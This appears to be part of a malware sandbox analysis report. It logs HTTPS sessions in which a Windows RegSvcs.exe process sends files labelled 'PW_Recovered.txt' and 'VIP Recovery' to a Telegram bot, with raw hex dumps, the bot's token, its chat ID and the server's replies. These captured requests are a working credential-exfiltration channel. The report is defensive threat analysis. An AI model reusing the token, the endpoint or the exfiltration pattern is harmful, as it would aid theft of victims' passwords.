                                                                          2024-09-19 10:21:43 UTC561INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 34 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61
                                                                          Data Ascii: {"ok":true,"result":{"message_id":12743,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"priva


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          22192.168.2.561520149.154.167.2204431488C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:21:47 UTC345OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=------------------------8dcd9bb28caf6f0
                                                                          Host: api.telegram.org
                                                                          Content-Length: 560
                                                                          2024-09-19 10:21:47 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 39 62 62 32 38 63 61 66 36 66 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 36 35 35 34 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 39 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 32 31 3a 30 34
                                                                          Data Ascii: --------------------------8dcd9bb28caf6f0Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:965543Date and Time: 19/09/2024 / 06:21:04
                                                                          2024-09-19 10:21:48 UTC388INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 19 Sep 2024 10:21:47 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 561
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                          2024-09-19 10:21:48 UTC561INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 34 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61
                                                                          Data Ascii: {"ok":true,"result":{"message_id":12744,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"priva


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          23192.168.2.561522149.154.167.2204435688C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:21:54 UTC369OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=------------------------8dcd9c6eb4b45c9
                                                                          Host: api.telegram.org
                                                                          Content-Length: 560
                                                                          Connection: Keep-Alive
                                                                          2024-09-19 10:21:54 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 39 63 36 65 62 34 62 34 35 63 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 36 35 35 34 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 39 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 32 31 3a 31 37
                                                                          Data Ascii: --------------------------8dcd9c6eb4b45c9Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:965543Date and Time: 19/09/2024 / 06:21:17
                                                                          2024-09-19 10:21:54 UTC388INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 19 Sep 2024 10:21:54 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 561
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                          2024-09-19 10:21:54 UTC561INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 34 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61
                                                                          Data Ascii: {"ok":true,"result":{"message_id":12745,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"priva


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          24192.168.2.561523149.154.167.2204431488C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:21:55 UTC345OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=------------------------8dcd9d920235f7a
                                                                          Host: api.telegram.org
                                                                          Content-Length: 560
                                                                          2024-09-19 10:21:55 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 39 64 39 32 30 32 33 35 66 37 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 36 35 35 34 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 39 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 32 31 3a 30 34
                                                                          Data Ascii: --------------------------8dcd9d920235f7aContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:965543Date and Time: 19/09/2024 / 06:21:04
                                                                          2024-09-19 10:21:55 UTC388INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 19 Sep 2024 10:21:55 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 561
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                          2024-09-19 10:21:55 UTC561INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 34 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61
                                                                          Data Ascii: {"ok":true,"result":{"message_id":12746,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"priva


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          25192.168.2.561526149.154.167.2204435688C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:21:58 UTC345OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=------------------------8dcd9daf8508ec0
                                                                          Host: api.telegram.org
                                                                          Content-Length: 560
                                                                          2024-09-19 10:21:58 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 39 64 61 66 38 35 30 38 65 63 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 36 35 35 34 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 39 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 32 31 3a 31 37
                                                                          Data Ascii: --------------------------8dcd9daf8508ec0Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:965543Date and Time: 19/09/2024 / 06:21:17
                                                                          2024-09-19 10:21:58 UTC388INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 19 Sep 2024 10:21:58 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 561
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                          2024-09-19 10:21:58 UTC561INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 34 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61
                                                                          Data Ascii: {"ok":true,"result":{"message_id":12747,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"priva


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          26192.168.2.561528149.154.167.2204431488C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:21:59 UTC345OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=------------------------8dcd9f34a734345
                                                                          Host: api.telegram.org
                                                                          Content-Length: 560
                                                                          2024-09-19 10:21:59 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 39 66 33 34 61 37 33 34 33 34 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 36 35 35 34 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 39 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 32 31 3a 30 34
                                                                          Data Ascii: --------------------------8dcd9f34a734345Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:965543Date and Time: 19/09/2024 / 06:21:04
                                                                          2024-09-19 10:21:59 UTC388INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 19 Sep 2024 10:21:59 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 561
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                          2024-09-19 10:21:59 UTC561INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 34 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61
                                                                          Data Ascii: {"ok":true,"result":{"message_id":12748,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"priva


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          27192.168.2.561530149.154.167.2204435688C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:22:02 UTC345OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=------------------------8dcd9f129bc3f60
                                                                          Host: api.telegram.org
                                                                          Content-Length: 560
                                                                          2024-09-19 10:22:02 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 39 66 31 32 39 62 63 33 66 36 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 36 35 35 34 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 39 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 32 31 3a 31 37
                                                                          Data Ascii: --------------------------8dcd9f129bc3f60Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:965543Date and Time: 19/09/2024 / 06:21:17
                                                                          2024-09-19 10:22:02 UTC388INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 19 Sep 2024 10:22:02 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 561
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                          2024-09-19 10:22:02 UTC561INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 34 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61
                                                                          Data Ascii: {"ok":true,"result":{"message_id":12749,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"priva


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          28192.168.2.561532149.154.167.2204431488C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:22:03 UTC345OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=------------------------8dcda0e47642328
                                                                          Host: api.telegram.org
                                                                          Content-Length: 560
                                                                          2024-09-19 10:22:03 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 61 30 65 34 37 36 34 32 33 32 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 36 35 35 34 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 39 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 32 31 3a 30 34
                                                                          Data Ascii: --------------------------8dcda0e47642328Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:965543Date and Time: 19/09/2024 / 06:21:04
                                                                          2024-09-19 10:22:03 UTC388INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 19 Sep 2024 10:22:03 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 561
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
